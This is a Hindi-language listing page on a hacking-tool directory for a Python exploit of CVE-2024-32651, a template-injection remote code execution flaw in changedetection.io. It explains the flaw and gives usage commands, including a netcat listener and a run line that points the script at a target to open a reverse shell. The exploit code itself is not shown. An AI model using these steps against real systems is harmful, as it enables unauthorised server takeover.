Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-32651-changedetection-RCE — सर्वर-साइड टेम्पलेट इंजेक्शन एक्सप्लॉइट | Kitploit
उपकरण/GitHubGitHub/s0ck3t-s3c/cve-2024-32651-changedetection-rce
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubs0ck3t-s3c/cve-2024-32651-changedetection-rce

CVE-2024-32651-changedetection-RCE

सर्वर-साइड टेम्पलेट इंजेक्शन एक्सप्लॉइट

रिपॉजिटरी देखें
4331 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-32651 changedetection < 0.45.20 - रिमोट कोड निष्पादन (RCE)

सर्वर-साइड टेम्पलेट इंजेक्शन एक्सप्लॉइट!!

1. शीर्षक

कमजोर वेब एप्लिकेशन में सर्वर-साइड टेम्पलेट इंजेक्शन (SSTI) के माध्यम से रिमोट कोड निष्पादन

2. विवरण

यह एक्सप्लॉइट उस वेब एप्लिकेशन को लक्षित करता है जो सर्वर-साइड टेम्पलेट इंजेक्शन (SSTI) के लिए कमजोर है। इस भेद्यता का फायदा उठाकर, एक हमलावर सर्वर पर मनमाने कमांड निष्पादित कर सकता है। दिया गया Python स्क्रिप्ट एक पेलोड सबमिट करके शोषण प्रक्रिया को स्वचालित करता है जो रिवर्स शेल ट्रिगर करता है।

3. भेद्यता जानकारी

  1. CVE ID: CVE-2024-32651
  2. प्रभावित सिस्टम: वेब एप्लिकेशन जो सर्वर-साइड टेम्पलेट इंजेक्शन (SSTI) का उपयोग करते हैं और कमजोर कॉन्फ़िगरेशन रखते हैं।

4. प्रमाण की अवधारणा

भेद्यता को पुन: उत्पन्न करने के लिए, प्रदान की गई Python स्क्रिप्ट को कमजोर वेब एप्लिकेशन के विरुद्ध निष्पादित करें। सुनिश्चित करें कि आपके पास एक लिसनर (जैसे, nc -lvp 9999) चल रहा है ताकि रिवर्स शेल कनेक्शन को कैप्चर किया जा सके।

5. उपयोग

  1. स्क्रिप्ट को सेव करें CVE-2024-32651.py नामक फ़ाइल में।

  2. आवश्यक Python लाइब्रेरीज़ इंस्टॉल करें यदि पहले से इंस्टॉल नहीं हैं:

    root@kitploit:~
    pip install requests beautifulsoup4
    
    
  3. स्क्रिप्ट का उपयोग करने के लिए, निम्नलिखित कमांड-लाइन तर्क प्रदान करें:

  • --url: कमजोर वेब एप्लिकेशन का बेस URL (जैसे, http://10.10.10.10:5000)।
  • --port: लिसनर के लिए पोर्ट (जैसे, 9999)।
  • --ip: लिसनर का IP पता (जैसे, 10.10.50.22)।
  • --notification: (वैकल्पिक) नोटिफिकेशन URL यदि आप किसी विशिष्ट नोटिफिकेशन URL का उपयोग करना चाहते हैं।
  1. स्क्रिप्ट चलाएँ Python 3 का उपयोग करके आवश्यक तर्कों के साथ। सिंटैक्स है:
    root@kitploit:~
    python3 CVE-2024-32651.py --url http://<TARGET_URL> --port <LISTENER_PORT> --ip <LISTENER_IP> [--notification <NOTIFICATION_URL>]
    

6. श्रेय

यह एक्सप्लॉइट का सुधारा गया संस्करण Zach Crosman (zcrosman) द्वारा EDB-ID: 52027 के साथ प्रकाशित मूल एक्सप्लॉइट पर आधारित था। आप मूल एक्सप्लॉइट को यहाँ देख सकते हैं। मैं Zach Crosman को सुरक्षा समुदाय में उनके योगदान के लिए धन्यवाद देता हूँ।

टूल डाउनलोड करें